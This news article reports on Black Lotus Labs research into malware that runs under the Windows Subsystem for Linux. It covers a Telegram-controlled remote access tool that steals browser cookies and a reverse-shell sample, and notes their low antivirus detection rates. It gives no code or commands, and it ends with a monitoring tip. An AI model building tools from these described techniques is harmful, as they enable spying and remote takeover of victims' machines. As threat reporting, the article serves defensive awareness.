Hackers are becoming increasingly interested in using the Windows Subsystem for Linux (WSL) as an attack surface as they develop new malware. The most complex instances are capable of spying and downloading other dangerous modules. As the name suggests, WSL enables native Linux binaries to process on Windows in an environment that imitates the Linux kernel.
Recently found WSL-based malware packages use open-source code to route communication through the Telegram messaging service and grant the threat actor remote access to the victim system. Researchers at Lumen Technologies’ Black Lotus Labs first detected malicious Linux binaries for WSL over a year ago and published a study on this new sort of vulnerability in September 2021. Despite being built on publicly available code, their number has steadily increased since then, with all versions having low detection rates.
Since last fall, researchers at Black Lotus Labs have tracked over 100 samples of WSL-based malware. They found some samples are more sophisticated than others, and threat actors “show continued interest” in the malware they follow. Two of the samples examined stand out owing to their ability to act as a remote access tool (RAT) or make a reverse shell on the infected host.
The two samples were discovered after a Black Lotus Labs study in March cautioned that WSL might become a favorite attack surface for attackers with varying levels of technical expertise. One of the most recent demonstrations used RAT-via-Telegram Bot, a Python-based open-source application that provides control through Telegram and includes capabilities for stealing authentication cookies from Google Chrome and Opera web browsers, issuing commands, and downloading data.
According to Black Lotus Labs researchers, the malware arrived with a live bot token and chat ID, indicating an operational command and control system. Taking screenshots and capturing user and system information (username, IP address, OS version) are also included in this edition, which aids the attacker in determining what malware or tools to employ in the next phase of the intrusion.
The researchers found that just two antivirus engines out of 57 on Virus Total recognized the sample as dangerous when Black Lotus Labs investigated it. A second WSL-based malware strain was recently identified and was designed to set up a reverse TCP shell on the affected system to interact with the attacker. The researchers found that the code employed an Amazon Web Services IP address previously used by multiple businesses. This sample had a pop-up message in Turkish that said, “you’re screwed and there’s not much you can do.” However, neither the pop-up message, which may imply Turkish-speaking recipients, nor the code revealed any information about the malware’s source.
According to the researchers, both malware modules might be used for espionage and can download data that would enhance their performance. Black Lotus Labs previously alerted that threat actors are digging further into the WSL vector, even if various samples evaluated “did not yet appear to be fully functional due to the use of internal or non-routable IPs.” Nonetheless, malware creators are making headway and have already built variations that can upload and download data, as well as execute attacker commands, on both Windows and Linux.
Unlike prior WSL-based malware, the newest variants examined by Black Lotus Labs “would prove effective with an active C2 [command and control] infrastructure in place given the low detection rates of AV providers.” To fight against WSL-based attacks, keep a watch on system activity (e.g., SysMon) to spot suspicious activity and examine commands.